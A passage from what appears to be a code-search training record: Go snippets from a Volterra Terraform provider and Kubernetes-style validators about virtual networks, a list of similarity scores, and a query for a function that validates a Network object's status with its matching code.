&ves_io_schema.RouteTarget4ByteAsn{}\n\t\t\t\t\t\tinternetRtargets[i].RtargetChoice = rtargetChoiceInt\n\n\t\t\t\t\t\tsl := v.(*schema.Set).List()\n\t\t\t\t\t\tfor _, set := range sl {\n\t\t\t\t\t\t\tcs := set.(map[string]interface{})\n\n\t\t\t\t\t\t\tif v, ok := cs[\"as_number\"]; ok && !isIntfNil(v) {\n\n\t\t\t\t\t\t\t\trtargetChoiceInt.Asn4ByteRtarget.AsNumber = uint32(v.(int))\n\n\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t\tif v, ok := cs[\"value\"]; ok && !isIntfNil(v) {\n\n\t\t\t\t\t\t\t\trtargetChoiceInt.Asn4ByteRtarget.Value = uint32(v.(int))\n\n\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t}\n\n\t\t\t\t\t}\n\n\t\t\t\t\tif v, ok := internetRtargetsMapStrToI[\"ipv4_addr_rtarget\"]; ok && !isIntfNil(v) && !rtargetChoiceTypeFound {\n\n\t\t\t\t\t\trtargetChoiceTypeFound = true\n\t\t\t\t\t\trtargetChoiceInt := &ves_io_schema.RouteTarget_Ipv4AddrRtarget{}\n\t\t\t\t\t\trtargetChoiceInt.Ipv4AddrRtarget = &ves_io_schema.RouteTargetIPv4Addr{}\n\t\t\t\t\t\tinternetRtargets[i].RtargetChoice = rtargetChoiceInt\n\n\t\t\t\t\t\tsl := v.(*schema.Set).List()\n\t\t\t\t\t\tfor _, set := range sl {\n\t\t\t\t\t\t\tcs := set.(map[string]interface{})\n\n\t\t\t\t\t\t\tif v, ok := cs[\"address\"]; ok && !isIntfNil(v) {\n\n\t\t\t\t\t\t\t\trtargetChoiceInt.Ipv4AddrRtarget.Address = v.(string)\n\n\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t\tif v, ok := cs[\"value\"]; ok && !isIntfNil(v) {\n\n\t\t\t\t\t\t\t\trtargetChoiceInt.Ipv4AddrRtarget.Value = uint32(v.(int))\n\n\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t}\n\n\t\t\t\t\t}\n\n\t\t\t\t}\n\n\t\t\t}\n\n\t\t\tnamespaceChoiceTypeFound := false\n\n\t\t\tif v, ok := cs[\"no_namespace_network\"]; ok && !isIntfNil(v) && !namespaceChoiceTypeFound {\n\n\t\t\t\tnamespaceChoiceTypeFound = true\n\n\t\t\t\tif v.(bool) {\n\t\t\t\t\tnamespaceChoiceInt := &ves_io_schema_virtual_network.PerSiteSrv6NetworkType_NoNamespaceNetwork{}\n\t\t\t\t\tnamespaceChoiceInt.NoNamespaceNetwork = &ves_io_schema.Empty{}\n\t\t\t\t\tnetworkChoiceInt.Srv6Network.NamespaceChoice = namespaceChoiceInt\n\t\t\t\t}\n\n\t\t\t}\n\n\t\t\tif v, ok := cs[\"srv6_network_ns_params\"]; ok && !isIntfNil(v) && !namespaceChoiceTypeFound {\n\n\t\t\t\tnamespaceChoiceTypeFound = true\n\t\t\t\tnamespaceChoiceInt := &ves_io_schema_virtual_network.PerSiteSrv6NetworkType_Srv6NetworkNsParams{}\n\t\t\t\tnamespaceChoiceInt.Srv6NetworkNsParams = &ves_io_schema_virtual_network.Srv6NetworkNsParametersType{}\n\t\t\t\tnetworkChoiceInt.Srv6Network.NamespaceChoice = namespaceChoiceInt\n\n\t\t\t\tsl := v.(*schema.Set).List()\n\t\t\t\tfor _, set := range sl {\n\t\t\t\t\tcs := set.(map[string]interface{})\n\n\t\t\t\t\tif v, ok := cs[\"namespace\"]; ok && !isIntfNil(v) {\n\n\t\t\t\t\t\tnamespaceChoiceInt.Srv6NetworkNsParams.Namespace = v.(string)\n\n\t\t\t\t\t}\n\n\t\t\t\t}\n\n\t\t\t}\n\n\t\t\tif v, ok := cs[\"remote_sid_stats_plen\"]; ok && !isIntfNil(v) {\n\n\t\t\t\tnetworkChoiceInt.Srv6Network.RemoteSidStatsPlen = uint32(v.(int))\n\n\t\t\t}\n\n\t\t\tif v, ok := cs[\"slice\"]; ok && !isIntfNil(v) {\n\n\t\t\t\tsl := v.(*schema.Set).List()\n\t\t\t\tsliceInt := &ves_io_schema_views.ObjectRefType{}\n\t\t\t\tnetworkChoiceInt.Srv6Network.Slice = sliceInt\n\n\t\t\t\tfor _, set := range sl {\n\t\t\t\t\tsMapToStrVal := set.(map[string]interface{})\n\t\t\t\t\tif val, ok := sMapToStrVal[\"name\"]; ok && !isIntfNil(v) {\n\t\t\t\t\t\tsliceInt.Name = val.(string)\n\t\t\t\t\t}\n\t\t\t\t\tif val, ok := sMapToStrVal[\"namespace\"]; ok && !isIntfNil(v) {\n\t\t\t\t\t\tsliceInt.Namespace = val.(string)\n\t\t\t\t\t}\n\n\t\t\t\t\tif val, ok := sMapToStrVal[\"tenant\"]; ok && !isIntfNil(v) {\n\t\t\t\t\t\tsliceInt.Tenant = val.(string)\n\t\t\t\t\t}\n\t\t\t\t}\n\n\t\t\t}\n\n\t\t\tsnatPoolChoiceTypeFound := false\n\n\t\t\tif v, ok := cs[\"fleet_snat_pool\"]; ok && !isIntfNil(v) && !snatPoolChoiceTypeFound {\n\n\t\t\t\tsnatPoolChoiceTypeFound = true\n\t\t\t\tsnatPoolChoiceInt := &ves_io_schema_virtual_network.PerSiteSrv6NetworkType_FleetSnatPool{}\n\t\t\t\tsnatPoolChoiceInt.FleetSnatPool = &ves_io_schema_virtual_network.SNATPoolFleetType{}\n\t\t\t\tnetworkChoiceInt.Srv6Network.SnatPoolChoice = snatPoolChoiceInt\n\n\t\t\t\tsl := v.(*schema.Set).List()\n\t\t\t\tfor _, set := range sl {\n\t\t\t\t\tcs := set.(map[string]interface{})\n\n\t\t\t\t\tif v, ok := cs[\"snat_pool_allocator\"]; ok && !isIntfNil(v) {\n\n\t\t\t\t\t\tsl := v.(*schema.Set).List()\n\t\t\t\t\t\tsnatPoolAllocatorInt := &ves_io_schema_views.ObjectRefType{}\n\t\t\t\t\t\tsnatPoolChoiceInt.FleetSnatPool.SnatPoolAllocator = snatPoolAllocatorInt\n\n\t\t\t\t\t\tfor _, set := range sl {\n\t\t\t\t\t\t\tspaMapToStrVal := set.(map[string]interface{})\n\t\t\t\t\t\t\tif val, ok := spaMapToStrVal[\"name\"]; ok && !isIntfNil(v) {\n\t\t\t\t\t\t\t\tsnatPoolAllocatorInt.Name = val.(string)\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\tif val, ok := spaMapToStrVal[\"namespace\"]; ok && !isIntfNil(v) {\n\t\t\t\t\t\t\t\tsnatPoolAllocatorInt.Namespace = val.(string)\n\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t\tif val, ok := spaMapToStrVal[\"tenant\"]; ok && !isIntfNil(v) {\n\t\t\t\t\t\t\t\tsnatPoolAllocatorInt.Tenant = val.(string)\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t}\n\n\t\t\t\t\t}\n\n\t\t\t\t}\n\n\t\t\t}\n\n\t\t\tif v, ok := cs[\"interface_ip_snat_pool\"]; ok && !isIntfNil(v) && !snatPoolChoiceTypeFound {\n\n\t\t\t\tsnatPoolChoiceTypeFound = true\n\n\t\t\t\tif v.(bool) {\n\t\t\t\t\tsnatPoolChoiceInt := &ves_io_schema_virtual_network.PerSiteSrv6NetworkType_InterfaceIpSnatPool{}\n\t\t\t\t\tsnatPoolChoiceInt.InterfaceIpSnatPool = &ves_io_schema.Empty{}\n\t\t\t\t\tnetworkChoiceInt.Srv6Network.SnatPoolChoice = snatPoolChoiceInt\n\t\t\t\t}\n\n\t\t\t}\n\n\t\t\tif v, ok := cs[\"site_snat_pool\"]; ok && !isIntfNil(v) && !snatPoolChoiceTypeFound {\n\n\t\t\t\tsnatPoolChoiceTypeFound = true\n\t\t\t\tsnatPoolChoiceInt := &ves_io_schema_virtual_network.PerSiteSrv6NetworkType_SiteSnatPool{}\n\t\t\t\tsnatPoolChoiceInt.SiteSnatPool = &ves_io_schema_virtual_network.SNATPoolSiteType{}\n\t\t\t\tnetworkChoiceInt.Srv6Network.SnatPoolChoice = snatPoolChoiceInt\n\n\t\t\t\tsl := v.(*schema.Set).List()\n\t\t\t\tfor _, set := range sl {\n\t\t\t\t\tcs := set.(map[string]interface{})\n\n\t\t\t\t\tif v, ok := cs[\"node_snat_pool\"]; ok && !isIntfNil(v) {\n\n\t\t\t\t\t\tsl := v.(*schema.Set).List()\n\t\t\t\t\t\tnodeSnatPool := make(map[string]*ves_io_schema_virtual_network.SNATPoolType)\n\t\t\t\t\t\tsnatPoolChoiceInt.SiteSnatPool.NodeSnatPool = nodeSnatPool\n\t\t\t\t\t\tfor _, set := range sl {\n\t\t\t\t\t\t\tnodeSnatPoolMapStrToI := set.(map[string]interface{})\n\t\t\t\t\t\t\tkey, ok := nodeSnatPoolMapStrToI[\"name\"]\n\t\t\t\t\t\t\tif ok && !isIntfNil(key) {\n\t\t\t\t\t\t\t\tnodeSnatPool[key.(string)] = &ves_io_schema_virtual_network.SNATPoolType{}\n\t\t\t\t\t\t\t\tval, _ := nodeSnatPoolMapStrToI[\"value\"]\n\n\t\t\t\t\t\t\t\tnodeSnatPoolVals := val.(*schema.Set).List()\n\t\t\t\t\t\t\t\tfor _, intVal := range nodeSnatPoolVals {\n\n\t\t\t\t\t\t\t\t\tnodeSnatPoolStaticMap := intVal.(map[string]interface{})\n\n\t\t\t\t\t\t\t\t\tif w, ok := nodeSnatPoolStaticMap[\"ipv4_prefixes\"]; ok && !isIntfNil(w) {\n\t\t\t\t\t\t\t\t\t\tnodeSnatPool[key.(string)].Ipv4Prefixes = nil\n\t\t\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t\t\t\tif w, ok := nodeSnatPoolStaticMap[\"ipv6_prefixes\"]; ok && !isIntfNil(w) {\n\t\t\t\t\t\t\t\t\t\tnodeSnatPool[key.(string)].Ipv6Prefixes = nil\n\t\t\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t\t\t\t// break after one loop\n\t\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t}\n\n\t\t\t\t\t}\n\n\t\t\t\t}\n\n\t\t\t}\n\n\t\t}\n\n\t}\n\n\tif v, ok := d.GetOk(\"static_routes\"); ok && !isIntfNil(v) {\n\n\t\tsl := v.([]interface{})\n\t\tstaticRoutes := make([]*ves_io_schema_virtual_network.StaticRouteViewType, len(sl))\n\t\tupdateSpec.StaticRoutes = staticRoutes\n\t\tfor i, set := range sl {\n\t\t\tstaticRoutes[i] = &ves_io_schema_virtual_network.StaticRouteViewType{}\n\t\t\tstaticRoutesMapStrToI := set.(map[string]interface{})\n\n\t\t\tif v, ok := staticRoutesMapStrToI[\"attrs\"]; ok && !isIntfNil(v) {\n\n\t\t\t\tattrsList := []ves_io_schema.RouteAttrType{}\n\t\t\t\tfor _, j := range v.([]interface{}) {\n\t\t\t\t\tattrsList = append(attrsList, ves_io_schema.RouteAttrType(ves_io_schema.RouteAttrType_value[j.(string)]))\n\t\t\t\t}\n\t\t\t\tstaticRoutes[i].Attrs = attrsList\n\n\t\t\t}\n\n\t\t\tif w, ok := staticRoutesMapStrToI[\"ip_prefixes\"]; ok && !isIntfNil(w) {\n\t\t\t\tls := make([]string, len(w.([]interface{})))\n\t\t\t\tfor i, v := range w.([]interface{}) {\n\t\t\t\t\tls[i] = v.(string)\n\t\t\t\t}\n\t\t\t\tstaticRoutes[i].IpPrefixes = ls\n\t\t\t}\n\n\t\t\tnextHopChoiceTypeFound := false\n\n\t\t\tif v, ok := staticRoutesMapStrToI[\"default_gateway\"]; ok && !isIntfNil(v) && !nextHopChoiceTypeFound {\n\n\t\t\t\tnextHopChoiceTypeFound = true\n\n\t\t\t\tif v.(bool) {\n\t\t\t\t\tnextHopChoiceInt := &ves_io_schema_virtual_network.StaticRouteViewType_DefaultGateway{}\n\t\t\t\t\tnextHopChoiceInt.DefaultGateway = &ves_io_schema.Empty{}\n\t\t\t\t\tstaticRoutes[i].NextHopChoice = nextHopChoiceInt\n\t\t\t\t}\n\n\t\t\t}\n\n\t\t\tif v, ok := staticRoutesMapStrToI[\"interface\"]; ok && !isIntfNil(v) && !nextHopChoiceTypeFound {\n\n\t\t\t\tnextHopChoiceTypeFound = true\n\t\t\t\tnextHopChoiceInt := &ves_io_schema_virtual_network.StaticRouteViewType_Interface{}\n\t\t\t\tnextHopChoiceInt.Interface = &ves_io_schema_views.ObjectRefType{}\n\t\t\t\tstaticRoutes[i].NextHopChoice = nextHopChoiceInt\n\n\t\t\t\tsl := v.(*schema.Set).List()\n\t\t\t\tfor _, set := range sl {\n\t\t\t\t\tcs := set.(map[string]interface{})\n\n\t\t\t\t\tif v, ok := cs[\"name\"]; ok && !isIntfNil(v) {\n\n\t\t\t\t\t\tnextHopChoiceInt.Interface.Name = v.(string)\n\n\t\t\t\t\t}\n\n\t\t\t\t\tif v, ok := cs[\"namespace\"]; ok && !isIntfNil(v) {\n\n\t\t\t\t\t\tnextHopChoiceInt.Interface.Namespace = v.(string)\n\n\t\t\t\t\t}\n\n\t\t\t\t\tif v, ok := cs[\"tenant\"]; ok && !isIntfNil(v) {\n\n\t\t\t\t\t\tnextHopChoiceInt.Interface.Tenant = v.(string)\n\n\t\t\t\t\t}\n\n\t\t\t\t}\n\n\t\t\t}\n\n\t\t\tif v, ok := staticRoutesMapStrToI[\"ip_address\"]; ok && !isIntfNil(v) && !nextHopChoiceTypeFound {\n\n\t\t\t\tnextHopChoiceTypeFound = true\n\t\t\t\tnextHopChoiceInt := &ves_io_schema_virtual_network.StaticRouteViewType_IpAddress{}\n\n\t\t\t\tstaticRoutes[i].NextHopChoice = nextHopChoiceInt\n\n\t\t\t\tnextHopChoiceInt.IpAddress = v.(string)\n\n\t\t\t}\n\n\t\t}\n\n\t}\n\n\tif v, ok := d.GetOk(\"static_v6_routes\"); ok && !isIntfNil(v) {\n\n\t\tsl := v.([]interface{})\n\t\tstaticV6Routes := make([]*ves_io_schema_virtual_network.StaticV6RouteViewType, len(sl))\n\t\tupdateSpec.StaticV6Routes = staticV6Routes\n\t\tfor i, set := range sl {\n\t\t\tstaticV6Routes[i] = &ves_io_schema_virtual_network.StaticV6RouteViewType{}\n\t\t\tstaticV6RoutesMapStrToI := set.(map[string]interface{})\n\n\t\t\tif v, ok := staticV6RoutesMapStrToI[\"attrs\"]; ok && !isIntfNil(v) {\n\n\t\t\t\tattrsList := []ves_io_schema.RouteAttrType{}\n\t\t\t\tfor _, j := range v.([]interface{}) {\n\t\t\t\t\tattrsList = append(attrsList, ves_io_schema.RouteAttrType(ves_io_schema.RouteAttrType_value[j.(string)]))\n\t\t\t\t}\n\t\t\t\tstaticV6Routes[i].Attrs = attrsList\n\n\t\t\t}\n\n\t\t\tif w, ok := staticV6RoutesMapStrToI[\"ip_prefixes\"]; ok && !isIntfNil(w) {\n\t\t\t\tls := make([]string, len(w.([]interface{})))\n\t\t\t\tfor i, v := range w.([]interface{}) {\n\t\t\t\t\tls[i] = v.(string)\n\t\t\t\t}\n\t\t\t\tstaticV6Routes[i].IpPrefixes = ls\n\t\t\t}\n\n\t\t\tnextHopChoiceTypeFound := false\n\n\t\t\tif v, ok := staticV6RoutesMapStrToI[\"default_gateway\"]; ok && !isIntfNil(v) && !nextHopChoiceTypeFound {\n\n\t\t\t\tnextHopChoiceTypeFound = true\n\n\t\t\t\tif v.(bool) {\n\t\t\t\t\tnextHopChoiceInt := &ves_io_schema_virtual_network.StaticV6RouteViewType_DefaultGateway{}\n\t\t\t\t\tnextHopChoiceInt.DefaultGateway = &ves_io_schema.Empty{}\n\t\t\t\t\tstaticV6Routes[i].NextHopChoice = nextHopChoiceInt\n\t\t\t\t}\n\n\t\t\t}\n\n\t\t\tif v, ok := staticV6RoutesMapStrToI[\"interface\"]; ok && !isIntfNil(v) && !nextHopChoiceTypeFound {\n\n\t\t\t\tnextHopChoiceTypeFound = true\n\t\t\t\tnextHopChoiceInt := &ves_io_schema_virtual_network.StaticV6RouteViewType_Interface{}\n\t\t\t\tnextHopChoiceInt.Interface = &ves_io_schema_views.ObjectRefType{}\n\t\t\t\tstaticV6Routes[i].NextHopChoice = nextHopChoiceInt\n\n\t\t\t\tsl := v.(*schema.Set).List()\n\t\t\t\tfor _, set := range sl {\n\t\t\t\t\tcs := set.(map[string]interface{})\n\n\t\t\t\t\tif v, ok := cs[\"name\"]; ok && !isIntfNil(v) {\n\n\t\t\t\t\t\tnextHopChoiceInt.Interface.Name = v.(string)\n\n\t\t\t\t\t}\n\n\t\t\t\t\tif v, ok := cs[\"namespace\"]; ok && !isIntfNil(v) {\n\n\t\t\t\t\t\tnextHopChoiceInt.Interface.Namespace = v.(string)\n\n\t\t\t\t\t}\n\n\t\t\t\t\tif v, ok := cs[\"tenant\"]; ok && !isIntfNil(v) {\n\n\t\t\t\t\t\tnextHopChoiceInt.Interface.Tenant = v.(string)\n\n\t\t\t\t\t}\n\n\t\t\t\t}\n\n\t\t\t}\n\n\t\t\tif v, ok := staticV6RoutesMapStrToI[\"ip_address\"]; ok && !isIntfNil(v) && !nextHopChoiceTypeFound {\n\n\t\t\t\tnextHopChoiceTypeFound = true\n\t\t\t\tnextHopChoiceInt := &ves_io_schema_virtual_network.StaticV6RouteViewType_IpAddress{}\n\n\t\t\t\tstaticV6Routes[i].NextHopChoice = nextHopChoiceInt\n\n\t\t\t\tnextHopChoiceInt.IpAddress = v.(string)\n\n\t\t\t}\n\n\t\t}\n\n\t}\n\n\tlog.Printf(\"[DEBUG] Updating Volterra VirtualNetwork obj with struct: %+v\", updateReq)\n\n\terr := client.ReplaceObject(context.Background(), ves_io_schema_virtual_network.ObjectType, updateReq)\n\tif err != nil {\n\t\treturn fmt.Errorf(\"error updating VirtualNetwork: %s\", err)\n\t}\n\n\treturn resourceVolterraVirtualNetworkRead(d, meta)\n}", "func (r *Storage) ValidateUpdate(_ runtime.Object) error {\n\tstoragelog.Info(\"validate update\", \"name\", r.Name)\n\treturn r.valid()\n}", "func (nt *Network) UpdateParams() {\n\tnt.Network.UpdateParams()\n}" ]
[ "0.7803706", "0.7432386", "0.6940642", "0.6773171", "0.65616477", "0.62644356", "0.6179208", "0.61404437", "0.60304904", "0.5948759", "0.5853366", "0.5791877", "0.5764017", "0.5707987", "0.5648009", "0.561715", "0.56039965", "0.560212", "0.55983096", "0.55652076", "0.5551288", "0.55347943", "0.55249107", "0.55125517", "0.55043894", "0.54939944", "0.54908544", "0.5480092", "0.5471511", "0.5460131", "0.5460063", "0.5459972", "0.54504216", "0.54392236", "0.5426035", "0.54196", "0.5418766", "0.5416552", "0.54106724", "0.5401054", "0.5356671", "0.5348033", "0.53217834", "0.5311755", "0.53103644", "0.5305233", "0.530243", "0.5237008", "0.5236826", "0.52293175", "0.52259797", "0.5225776", "0.52177024", "0.52154803", "0.52106917", "0.5208253", "0.5200329", "0.5196747", "0.5186935", "0.5185372", "0.5170241", "0.5155443", "0.5154012", "0.5151046", "0.5146486", "0.5138491", "0.51335347", "0.51309925", "0.512008", "0.5118662", "0.5114645", "0.51136607", "0.511344", "0.51099974", "0.50966036", "0.50955725", "0.5092762", "0.5079561", "0.5078271", "0.5077188", "0.5071561", "0.5070423", "0.50676847", "0.505475", "0.50506765", "0.5048504", "0.50151294", "0.5009444", "0.5005999", "0.5000898", "0.49934673", "0.4992861", "0.49872458", "0.49865088", "0.49757272", "0.49720725", "0.49717554", "0.49715865", "0.49708363", "0.4968278" ]
0.84096605
0
ValidateNetworkStatus validates the status of a Network object.
func ValidateNetworkStatus(spec *extensionsv1alpha1.NetworkStatus, fldPath *field.Path) field.ErrorList { allErrs := field.ErrorList{} return allErrs }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func ValidateNetworkStatusUpdate(newStatus, oldStatus extensionsv1alpha1.NetworkStatus) field.ErrorList {\n\tallErrs := field.ErrorList{}\n\n\treturn allErrs\n}", "func (m *PVMInstanceNetwork) Validate(formats strfmt.Registry) error {\n\treturn nil\n}", "func (m *Network) Validate(formats strfmt.Registry) error {\n\tvar res []error\n\n\tif err := m.validateID(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateMasterInterface(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateType(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif len(res) > 0 {\n\t\treturn errors.CompositeValidationError(res...)\n\t}\n\treturn nil\n}", "func ValidateNetwork(network *extensionsv1alpha1.Network) field.ErrorList {\n\tallErrs := field.ErrorList{}\n\tallErrs = append(allErrs, apivalidation.ValidateObjectMeta(&network.ObjectMeta, true, apivalidation.NameIsDNSSubdomain, field.NewPath(\"metadata\"))...)\n\tallErrs = append(allErrs, ValidateNetworkSpec(&network.Spec, field.NewPath(\"spec\"))...)\n\n\treturn allErrs\n}", "func (n *Network) Validate() field.ErrorList {\n\tvar validateErrors field.ErrorList\n\n\t// validate network config (id, genesis, consensus and join)\n\tvalidateErrors = append(validateErrors, n.Spec.NetworkConfig.Validate()...)\n\n\t// validate nodes\n\tvalidateErrors = append(validateErrors, n.ValidateNodes()...)\n\n\treturn validateErrors\n}", "func ValidateNetworkMode(c *Config) error {\n\tif c.General.Mode == \"\" {\n\t\tc.General.Mode = DefaultNetMode\n\t}\n\tc.General.Mode = strings.ToLower(c.General.Mode)\n\tswitch c.General.Mode {\n\tcase DualStackNetMode:\n\t\tfallthrough\n\tcase IPv4NetMode:\n\t\tfallthrough\n\tcase IPv6NetMode:\n\t\tglog.Infof(\"Building cluster in mode %q\", c.General.Mode)\n\tdefault:\n\t\treturn fmt.Errorf(\"unsupported network mode %q entered\", c.General.Mode)\n\t}\n\treturn nil\n}", "func (nt NetworkType) Validate() error {\n\tswitch nt {\n\tcase NetworkTypeDefault, NetworkTypeHost, NetworkTypeWeave:\n\t\treturn nil\n\tdefault:\n\t\treturn maskAny(errgo.WithCausef(nil, ValidationError, \"unknown network type '%s'\", string(nt)))\n\t}\n}", "func ValidateNetworkUpdate(new, old *extensionsv1alpha1.Network) field.ErrorList {\n\tallErrs := field.ErrorList{}\n\n\tallErrs = append(allErrs, apivalidation.ValidateObjectMetaUpdate(&new.ObjectMeta, &old.ObjectMeta, field.NewPath(\"metadata\"))...)\n\tallErrs = append(allErrs, ValidateNetworkSpecUpdate(&new.Spec, &old.Spec, new.DeletionTimestamp != nil, field.NewPath(\"spec\"))...)\n\tallErrs = append(allErrs, ValidateNetwork(new)...)\n\n\treturn allErrs\n}", "func (o *IpamNetworkDataData) SetNetworkIsValid(v string) {\n\to.NetworkIsValid = &v\n}", "func validateNetwork(t *testing.T, workingDir string) {\n\tterraformOptions := test_structure.LoadTerraformOptions(t, workingDir)\n\n\tsubnetNames := terraformOptions.Vars[\"subnet_names\"].([]interface{})\n\n\toutput := terraform.Output(t, terraformOptions, \"network_id\")\n\tassert.NotEmpty(t, output, \"network_id is empty\")\n\n\tsubnets := terraform.OutputList(t, terraformOptions, \"subnet_ids\")\n\tassert.Len(t, subnets, len(subnetNames), \"`subnet_ids` length is invalid\")\n\n\taddresses := terraform.OutputList(t, terraformOptions, \"subnet_address_ranges\")\n\tassert.Len(t, addresses, len(subnetNames), \"`subnet_address_ranges` length is invalid\")\n\n\t// check addresses\n\tfor _, cidr := range addresses {\n\t\t_, _, err := net.ParseCIDR(cidr)\n\t\tassert.Nil(t, err, \"net.ParseCIDR\")\n\t}\n}", "func CheckNetworkStatus() error {\n\tif SunnyDay {\n\t\treturn nil\n\t}\n\treturn fmt.Errorf(\"No Internet\")\n}", "func (in *Network_STATUS) DeepCopy() *Network_STATUS {\n\tif in == nil {\n\t\treturn nil\n\t}\n\tout := new(Network_STATUS)\n\tin.DeepCopyInto(out)\n\treturn out\n}", "func (m VMStatus) Validate(formats strfmt.Registry) error {\n\tvar res []error\n\n\t// value enum\n\tif err := m.validateVMStatusEnum(\"\", \"body\", m); err != nil {\n\t\treturn err\n\t}\n\n\tif len(res) > 0 {\n\t\treturn errors.CompositeValidationError(res...)\n\t}\n\treturn nil\n}", "func (o *IpamNetworkDataData) GetNetworkIsValidOk() (*string, bool) {\n\tif o == nil || o.NetworkIsValid == nil {\n\t\treturn nil, false\n\t}\n\treturn o.NetworkIsValid, true\n}", "func ValidateNetworkSpec(spec *extensionsv1alpha1.NetworkSpec, fldPath *field.Path) field.ErrorList {\n\tallErrs := field.ErrorList{}\n\n\tif len(spec.Type) == 0 {\n\t\tallErrs = append(allErrs, field.Required(fldPath.Child(\"type\"), \"field is required\"))\n\t}\n\n\tvar cidrs []cidrvalidation.CIDR\n\n\tif len(spec.PodCIDR) == 0 {\n\t\tallErrs = append(allErrs, field.Required(fldPath.Child(\"podCIDR\"), \"field is required\"))\n\t} else {\n\t\tcidrs = append(cidrs, cidrvalidation.NewCIDR(spec.PodCIDR, fldPath.Child(\"podCIDR\")))\n\t}\n\n\tif len(spec.ServiceCIDR) == 0 {\n\t\tallErrs = append(allErrs, field.Required(fldPath.Child(\"serviceCIDR\"), \"field is required\"))\n\t} else {\n\t\tcidrs = append(cidrs, cidrvalidation.NewCIDR(spec.ServiceCIDR, fldPath.Child(\"serviceCIDR\")))\n\t}\n\n\tallErrs = append(allErrs, cidrvalidation.ValidateCIDRParse(cidrs...)...)\n\tallErrs = append(allErrs, cidrvalidation.ValidateCIDROverlap(cidrs, cidrs, false)...)\n\n\treturn allErrs\n}", "func (m *IPLBVrackNetworkVrackNetwork) Validate(formats strfmt.Registry) error {\n\tvar res []error\n\n\tif err := m.validateSubnet(formats); err != nil {\n\t\t// prop\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateVrackNetworkID(formats); err != nil {\n\t\t// prop\n\t\tres = append(res, err)\n\t}\n\n\tif len(res) > 0 {\n\t\treturn errors.CompositeValidationError(res...)\n\t}\n\treturn nil\n}", "func (m *InterfaceConnectionStatus) Validate(formats strfmt.Registry) error {\n\tvar res []error\n\n\tif err := m.validateLabel(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateValue(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif len(res) > 0 {\n\t\treturn errors.CompositeValidationError(res...)\n\t}\n\treturn nil\n}", "func (m *PowerPortConnectionStatus) Validate(formats strfmt.Registry) error {\n\tvar res []error\n\n\tif err := m.validateLabel(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateValue(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif len(res) > 0 {\n\t\treturn errors.CompositeValidationError(res...)\n\t}\n\treturn nil\n}", "func (m *CrossConnectStatus) Validate(formats strfmt.Registry) error {\n\tvar res []error\n\n\tif err := m.validateCrossConnectID(formats); err != nil {\n\t\t// prop\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateInterfaceState(formats); err != nil {\n\t\t// prop\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateLightLevelIndBm(formats); err != nil {\n\t\t// prop\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateLightLevelIndicator(formats); err != nil {\n\t\t// prop\n\t\tres = append(res, err)\n\t}\n\n\tif len(res) > 0 {\n\t\treturn errors.CompositeValidationError(res...)\n\t}\n\treturn nil\n}", "func statusValidate(status *DevAuthApiStatus) error {\n\tif status.Status != model.DevStatusAccepted &&\n\t\tstatus.Status != model.DevStatusRejected &&\n\t\tstatus.Status != model.DevStatusPending {\n\t\treturn ErrIncorrectStatus\n\t} else {\n\t\treturn nil\n\t}\n}", "func TestNetworkStatus(t *testing.T) {\n\tedgeNode := tc.GetEdgeNode(tc.WithTest(t))\n\n\targs := flag.Args()\n\tif len(args) == 0 {\n\t\tt.Fatalf(\"Usage: %s [options] state vol_name...\\n\", os.Args[0])\n\t} else {\n\t\tsecs := int(timewait.Seconds())\n\t\tstate := args[0]\n\t\tt.Log(utils.AddTimestamp(fmt.Sprintf(\"networks: '%s' expected state: '%s' secs: %d\\n\",\n\t\t\targs[1:], state, secs)))\n\n\t\tnws := args[1:]\n\t\tif nws[len(nws)-1] == \"&\" {\n\t\t\tnws = nws[:len(nws)-1]\n\t\t}\n\t\tstates = make(map[string][]nwState)\n\t\tfor _, el := range nws {\n\t\t\tstates[el] = []nwState{{state: \"no info from controller\", timestamp: time.Now()}}\n\t\t}\n\n\t\tif !*newitems {\n\t\t\t// observe existing info object and feed them into eveState object\n\t\t\tif err := tc.GetController().InfoLastCallback(edgeNode.GetID(), nil, eveState.InfoCallback()); err != nil {\n\t\t\t\tt.Fatal(err)\n\t\t\t}\n\t\t}\n\n\t\t// we are done if our eveState object is in required state\n\t\tif ready := checkState(eveState, state, nws); ready == nil {\n\n\t\t\ttc.AddProcInfo(edgeNode, checkNet(state, nws))\n\n\t\t\tcallback := func() {\n\t\t\t\tt.Errorf(\"ASSERTION FAILED (%s): expected networks %s in %s state\", time.Now().Format(time.RFC3339Nano), nws, state)\n\t\t\t\tfor k, v := range states {\n\t\t\t\t\tt.Errorf(\"\\tactual %s: %s\", k, v[len(v)-1].state)\n\t\t\t\t\tif checkNewLastState(k, state) {\n\t\t\t\t\t\tt.Errorf(\"\\thistory of states for %s:\", k)\n\t\t\t\t\t\tfor _, st := range v {\n\t\t\t\t\t\t\tt.Errorf(\"\\t\\tstate: %s received in: %s\", st.state, st.timestamp.Format(time.RFC3339Nano))\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\n\t\t\ttc.WaitForProcWithErrorCallback(secs, callback)\n\n\t\t} else {\n\t\t\tt.Log(utils.AddTimestamp(ready.Error()))\n\t\t}\n\n\t\t// sleep to reduce concurrency effects\n\t\ttime.Sleep(1 * 